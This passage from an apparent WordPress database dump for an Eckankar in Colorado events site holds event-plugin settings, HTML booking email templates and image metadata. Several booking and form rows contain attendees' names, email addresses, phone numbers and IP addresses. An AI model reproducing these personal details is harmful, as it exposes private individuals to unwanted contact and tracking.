email, please feel free to get in touch, we\'re always happy to help out.</p>\r\n</div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"background-color: #6e6e6e; height: 100%; width: 100% !important; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px; border: 0px solid transparent;\">\r\n<table style=\"font-family: arial,helvetica,sans-serif;\" role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif;\" align=\"left\">\r\n<div>\r\n<div style=\"text-align: center; font-family: arial, helvetica, sans-serif;\"><a href=\"https://www.facebook.com/people/Eckankar-in-Colorado/100067829705562/\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /></a>\r\n<p style=\"text-align: center; font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado<br />\r\n<span style=\"font-family: arial, helvetica, sans-serif;\"><a title=\"Contact Us\" href=\"mailto:webmaster@eckankar-colorado.org\"><span style=\"font-size: 14px; line-height: 20px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto; color: #cccccc; margin: 0px;\">Contact Us</span></a></span></p>\r\n</div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:22:\"New Event Registration\";s:7:\"content\";s:8368:\"<table id=\"u_body\" style=\"border-collapse: collapse; table-layout: fixed; border-spacing: 0; mso-table-lspace: 0pt; mso-table-rspace: 0pt; vertical-align: top; min-width: 320px; margin: 0 auto; background-color: #f1f1f1; width: 100%;\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr style=\"vertical-align: top;\">\r\n<td style=\"word-break: break-word; border-collapse: collapse !important; vertical-align: top;\">\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"height: 100%; width: 100% !important;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border: 0px solid transparent;\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"background-color: #ffffff; height: 100%; width: 100% !important; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px; border: 0px solid transparent;\">\r\n<table style=\"font-family: arial,helvetica,sans-serif;\" role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif; background-color: #efefef;\" align=\"left\">\r\n<div>\r\n<div style=\"margin: 0px; line-height: 140%; text-align: center; word-wrap: break-word; font-size: 28px; font-weight: bold; color: #f28a27;\">\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"color: #1d5791; font-family: arial, helvetica, sans-serif; font-size: 36px;\">Admin Notification</span></div>\r\n</div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"background-color: #ffffff; height: 100%; width: 100% !important; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px; border: 1px solid #CCC;\">\r\n<table style=\"font-family: arial,helvetica,sans-serif;\" role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif;\" align=\"left\">\r\n<div style=\"text-align: center;\"><span style=\"color: #707172; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>New Event Registration</strong></span></div>\r\n<div style=\"text-align: center;\"><br />\r\n<span style=\"font-size: 20px; color: #333333;\"><strong>A new registration has been submitted for the following event:</strong></span>\r\n<p> <span style=\"font-size: 19px; color: #23507d;\"><strong>%%event_title%%</strong></span></p>\r\n<div></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Date: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_date%%</strong></span></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Time: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_time%%</strong></span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"background-color: #e8e8e8; height: 100%; width: 100% !important; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px; border: 0px solid transparent;\">\r\n<table style=\"font-family: arial,helvetica,sans-serif;\" role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif;\" align=\"left\">\r\n<div>\r\n<div>\r\n<p style=\"padding: 20px; font-size: 16px; line-height: 22px; background-color: #efefef; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35); text-align: center;\"><span style=\"font-size: 14pt;\"><span style=\"font-size: 14pt;\">%%attendees_full_info%%</span></span></p>\r\n</div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"background-color: #6e6e6e; height: 100%; width: 100% !important; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px; border: 0px solid transparent;\">\r\n<table style=\"font-family: arial,helvetica,sans-serif;\" role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif;\" align=\"left\">\r\n<div>\r\n<div style=\"text-align: center; font-family: arial, helvetica, sans-serif;\"><a href=\"https://www.facebook.com/people/Eckankar-in-Colorado/100067829705562/\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /></a>\r\n<p style=\"text-align: center; font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado<br />\r\n<span style=\"font-family: arial, helvetica, sans-serif;\"><a title=\"Contact Us\" href=\"mailto:webmaster@eckankar-colorado.org\"><span style=\"font-size: 14px; line-height: 20px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto; color: #cccccc; margin: 0px;\">Contact Us</span></a></span></p>\r\n</div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\";}}'),(193199,269160,'_thumbnail_id','269161'),(193200,269162,'_field_654','Reid'),(193201,269162,'_field_652','Heassler'),(193202,269162,'_field_653','jartzchongrh@live.com'),(193203,269162,'_field_651','(720) 219-4127'),(193204,269162,'_field_656','The ECK Satsang Discourses  Second Series - STARTS IN NOVEMBER -- 1st Tuesday at 700 pm - Zoom'),(193205,269162,'_field_649',''),(193206,269162,'_form_id','61'),(193207,269162,'_seq_num','33'),(193208,269163,'mec_transaction_id','OSR63382'),(193209,269163,'mec_gateway','MEC_gateway_free'),(193210,269163,'mec_gateway_label','Free'),(193211,269163,'mec_user_id','1000021'),(193212,269163,'mec_verified','1'),(193213,269163,'mec_verification_key','e32c2b2394ab7467cd637c9941afd16a'),(193214,269163,'mec_cancellation_key','020126a2f857cbc5fb6c50d71ef3a9af'),(193215,269163,'mec_confirmed','1'),(193216,269163,'mec_event_id','269109'),(193217,269163,'mec_date','1696761000:1696764600'),(193218,269163,'mec_ticket_id',',1,'),(186188,268726,'mec_color',''),(186189,268726,'mec_location_id','118'),(186190,268726,'mec_dont_show_map','0'),(186191,268726,'mec_organizer_id','1'),(186192,268726,'mec_read_more',''),(186193,268726,'mec_more_info',''),(186194,268726,'mec_more_info_title',''),(186195,268726,'mec_more_info_target','_self'),(186196,268726,'mec_cost',''),(186197,268726,'mec_currency','a:0:{}'),(186198,268726,'mec_additional_organizer_ids','a:0:{}'),(186199,268726,'mec_additional_location_ids','a:0:{}'),(186200,268726,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2027-08-15\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2027-08-15\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(185865,268685,'mec_event_status','EventScheduled'),(185866,268685,'mec_moved_online_link',''),(185867,268685,'mec_cancelled_reason',''),(185868,268685,'mec_display_cancellation_reason_in_single_page',''),(185869,268685,'protect_children',''),(185870,268685,'passster_activate_global_protection',NULL),(185871,268685,'passster_activate_protection',NULL),(185872,268685,'passster_protection_type','password'),(185873,268685,'boldgrid_hide_page_title','0'),(185874,268685,'_thumbnail_id','268485'),(185875,268685,'_oembed_ace4d65561aa575fe8833c60d61f4161','{{unknown}}'),(185876,268685,'boldgrid_in_page_containers','1'),(185889,268685,'_dp_original','266545'),(185878,268685,'passster_area_shortcode',''),(185879,268685,'mec_cost_auto_calculate','0'),(185880,268685,'mec_style_per_event','global'),(185881,268685,'mec_trailer_url',''),(185882,268685,'mec_trailer_title',''),(185883,268685,'mec_start_datetime','2023-07-02 10:30 AM'),(185884,268685,'mec_end_datetime','2023-07-02 11:30 AM'),(185885,268685,'mec_sequence','19'),(185886,268685,'mec_event_gallery','a:0:{}'),(185887,268685,'mec_related_events','a:0:{}'),(185888,268685,'mec_banner','a:0:{}'),(185890,268685,'_edit_lock','1689035415:2'),(185891,268685,'_edit_last','2'),(185892,266827,'mec_cost_auto_calculate','0'),(185893,266827,'mec_style_per_event','global'),(185894,266827,'mec_trailer_url',''),(185895,266827,'mec_trailer_title',''),(185896,266827,'mec_start_datetime','2022-01-06 08:00 AM'),(185897,266827,'mec_end_datetime','2022-01-06 06:00 PM'),(185898,266827,'mec_sequence','6'),(193830,269221,'_field_651','(303) 919-7837'),(185899,266827,'mec_event_gallery','a:0:{}'),(185900,266827,'mec_related_events','a:0:{}'),(185901,266827,'mec_banner','a:0:{}'),(188052,268824,'_wp_attached_file','2023/07/init-esa-confirmation-blue-2.jpg'),(185917,268691,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:6992;s:12:\"smushed-size\";i:5637;s:15:\"savings-percent\";d:19.379999999999999005240169935859739780426025390625;s:10:\"sizes-info\";a:9:{s:4:\"full\";a:2:{s:8:\"original\";i:6992;s:10:\"compressed\";i:5637;}s:6:\"medium\";a:2:{s:8:\"original\";i:1390;s:10:\"compressed\";i:1324;}s:5:\"large\";a:2:{s:8:\"original\";i:5074;s:10:\"compressed\";i:5008;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:838;s:10:\"compressed\";i:772;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:3425;s:10:\"compressed\";i:3359;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:1344;s:10:\"compressed\";i:1278;}s:12:\"thumbrelated\";a:2:{s:8:\"original\";i:2162;s:10:\"compressed\";i:2096;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:2020;s:10:\"compressed\";i:1954;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:1693;s:10:\"compressed\";i:1627;}}}'),(185918,268705,'_wp_attached_file','2023/02/sa-events-img-3sm.jpg'),(185919,268705,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1061;s:6:\"height\";i:79;s:4:\"file\";s:29:\"2023/02/sa-events-img-3sm.jpg\";s:8:\"filesize\";i:5988;s:5:\"sizes\";a:9:{s:6:\"medium\";a:5:{s:4:\"file\";s:28:\"sa-events-img-3sm-350x26.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:26;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1320;}s:5:\"large\";a:5:{s:4:\"file\";s:29:\"sa-events-img-3sm-1024x76.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:76;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4272;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:28:\"sa-events-img-3sm-150x79.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:79;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:755;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:28:\"sa-events-img-3sm-768x57.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:57;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3082;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:28:\"sa-events-img-3sm-300x79.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:79;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1155;}s:12:\"thumbrelated\";a:5:{s:4:\"file\";s:28:\"sa-events-img-3sm-500x79.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:79;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1788;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:28:\"sa-events-img-3sm-474x79.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:79;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1702;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:28:\"sa-events-img-3sm-391x79.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:79;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1448;}s:8:\"tileview\";a:5:{s:4:\"file\";s:28:\"sa-events-img-3sm-300x79.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:79;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1155;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(185920,268705,'original-file','2023/02/sa-events-img-3sm-updraft-pre-smush-original.jpg'),(185921,268705,'smush-complete','1'),(185922,268705,'smush-info','The file was compressed from 5.85 KB to 4.68 KB saving 19.89 percent using WP-Optimize'),(185923,268705,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:5988;s:12:\"smushed-size\";i:4797;s:15:\"savings-percent\";d:19.8900000000000005684341886080801486968994140625;s:10:\"sizes-info\";a:9:{s:4:\"full\";a:2:{s:8:\"original\";i:5988;s:10:\"compressed\";i:4797;}s:6:\"medium\";a:2:{s:8:\"original\";i:1320;s:10:\"compressed\";i:1254;}s:5:\"large\";a:2:{s:8:\"original\";i:4272;s:10:\"compressed\";i:4206;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:755;s:10:\"compressed\";i:689;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:3082;s:10:\"compressed\";i:3016;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:1155;s:10:\"compressed\";i:1089;}s:12:\"thumbrelated\";a:2:{s:8:\"original\";i:1788;s:10:\"compressed\";i:1722;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:1702;s:10:\"compressed\";i:1636;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:1448;s:10:\"compressed\";i:1382;}}}'),(185931,268713,'mec_confirmed','1'),(185932,268713,'mec_event_id','268685'),(185933,268713,'mec_date','1688293800:1688297400'),(185934,268713,'mec_ticket_id',',1,'),(185935,268713,'mec_booking_time','2023-06-27 14:41:53'),(185936,268713,'mec_all_dates','a:0:{}'),(185937,268713,'mec_other_dates','a:0:{}'),(185938,268713,'mec_attention_time','1688293800:1688297400'),(185939,268713,'mec_attention_time_start','1688293800'),(185940,268713,'mec_attention_time_end','1688297400'),(185941,268713,'mec_book_date_submit','20230627144153'),(185942,268713,'mec_booking_location','118'),(185943,268713,'mec_ticket_price_1','0'),(185944,268713,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:22:\"lawless80537@gmail.com\";s:4:\"name\";s:8:\"Jeff Law\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:13:\"76.25.156.174\";}}'),(185945,268713,'mec_price','0'),(185946,268713,'mec_payable','0'),(185947,268713,'mec_local_timezone','America/Denver'),(189182,268860,'mec_end_datetime','2023-08-27 11:30 AM'),(189158,268860,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(189157,268860,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-08-27\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-08-27\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(189156,268860,'mec_additional_location_ids','a:0:{}'),(189155,268860,'mec_additional_organizer_ids','a:0:{}'),(189154,268860,'mec_currency','a:0:{}'),(189153,268860,'mec_cost_auto_calculate','0'),(189152,268860,'mec_cost',''),(189151,268860,'mec_more_info_target','_self'),(189150,268860,'mec_more_info_title',''),(189149,268860,'mec_more_info',''),(189148,268860,'mec_read_more',''),(189147,268860,'mec_organizer_id','1'),(189144,268860,'mec_color',''),(189145,268860,'mec_location_id','122'),(189146,268860,'mec_dont_show_map','0'),(189143,268860,'_thumbnail_id','268857'),(189142,268860,'_edit_last','2'),(189141,268860,'_edit_lock','1690820485:2'),(193219,269163,'mec_booking_time','2023-10-03 21:22:50'),(193220,269163,'mec_all_dates','a:0:{}'),(193221,269163,'mec_other_dates','a:0:{}'),(193222,269163,'mec_attention_time','1696761000:1696764600'),(193223,269163,'mec_attention_time_start','1696761000'),(193224,269163,'mec_attention_time_end','1696764600'),(193225,269163,'mec_book_date_submit','20231003212250'),(193226,269163,'mec_booking_location','129'),(193227,269163,'mec_ticket_price_1','0'),(193228,269163,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:20:\"choll.03@comcast.net\";s:4:\"name\";s:3:\"Tad\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:14:\"76.130.120.198\";}}'),(193229,269163,'mec_price','0'),(193230,269163,'mec_payable','0'),(193231,269163,'mec_local_timezone','America/Denver'),(193253,269164,'mec_price','0'),(193254,269164,'mec_payable','0'),(193255,269164,'mec_local_timezone','America/Denver'),(193297,269169,'mec_date','1696761000:1696764600'),(193298,269169,'mec_ticket_id',',1,'),(193299,269169,'mec_booking_time','2023-10-05 20:18:36'),(193300,269169,'mec_all_dates','a:0:{}'),(186201,268726,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(186202,268726,'mec_certain_weekdays','a:0:{}'),(186203,268726,'mec_allday','0'),(186204,268726,'one_occurrence','0'),(186205,268726,'mec_hide_time','0'),(193301,269169,'mec_other_dates','a:0:{}'),(193302,269169,'mec_attention_time','1696761000:1696764600'),(189219,268860,'_wp_old_slug','spiritual-balance-in-challenging-times-3'),(189215,268860,'passster_area_shortcode',''),(189214,268860,'boldgrid_in_page_containers','1'),(189213,268860,'boldgrid_hide_page_title','0'),(189194,268860,'mec_booking','a:27:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:24:\"bookings_payable_inherit\";s:1:\"1\";s:16:\"bookings_payable\";s:3:\"100\";s:21:\"bookings_payable_type\";s:7:\"percent\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(189190,268860,'mec_sequence','9'),(189191,268860,'mec_in_days',''),(189192,268860,'mec_not_in_days',''),(189193,268860,'mec_hourly_schedules','a:0:{}'),(189189,268860,'mec_advanced_days','a:0:{}'),(189188,268860,'mec_repeat_end_at_date',''),(189208,268860,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(189207,268860,'mec_banner','a:0:{}'),(189206,268860,'mec_related_events','a:0:{}'),(189205,268860,'mec_event_gallery','a:0:{}'),(189204,268860,'mec_fields','a:0:{}'),(189203,268860,'mec_op','a:0:{}'),(189202,268860,'mec_bfixed_fields','a:0:{}'),(189201,268860,'mec_reg_fields','a:0:{}'),(189200,268860,'mec_reg_fields_global_inheritance','1'),(189199,268860,'mec_ticket_variations','a:0:{}'),(189196,268860,'mec_fees_global_inheritance','1'),(189197,268860,'mec_fees','a:0:{}'),(189198,268860,'mec_ticket_variations_global_inheritance','1'),(189195,268860,'mec_tickets','a:0:{}'),(189212,268860,'mec_display_cancellation_reason_in_single_page',''),(189211,268860,'mec_cancelled_reason',''),(189210,268860,'mec_moved_online_link',''),(189209,268860,'mec_event_status','EventScheduled'),(186207,268726,'mec_comment',''),(186208,268726,'mec_timezone','global'),(186209,268726,'mec_countdown_method','global'),(186210,268726,'mec_public','1'),(186211,268726,'mec_start_date','2027-08-15'),(186212,268726,'mec_start_time_hour','10'),(186213,268726,'mec_start_time_minutes','30'),(186214,268726,'mec_start_time_ampm','AM'),(186215,268726,'mec_start_day_seconds','37800'),(186216,268726,'mec_end_date','2027-08-15'),(186217,268726,'mec_end_time_hour','11'),(186218,268726,'mec_end_time_minutes','30'),(186219,268726,'mec_end_time_ampm','PM'),(186220,268726,'mec_end_day_seconds','84600'),(186221,268726,'mec_repeat_status','0'),(186222,268726,'mec_repeat_type',''),(186223,268726,'mec_repeat_interval','1'),(186224,268726,'mec_repeat_end',''),(186225,268726,'mec_repeat_end_at_occurrences',''),(186226,268726,'mec_repeat_end_at_date',''),(186227,268726,'mec_advanced_days','a:0:{}'),(186228,268726,'mec_in_days',''),(186229,268726,'mec_not_in_days',''),(186230,268726,'mec_hourly_schedules','a:0:{}'),(186231,268726,'mec_booking','a:27:{s:24:\"bookings_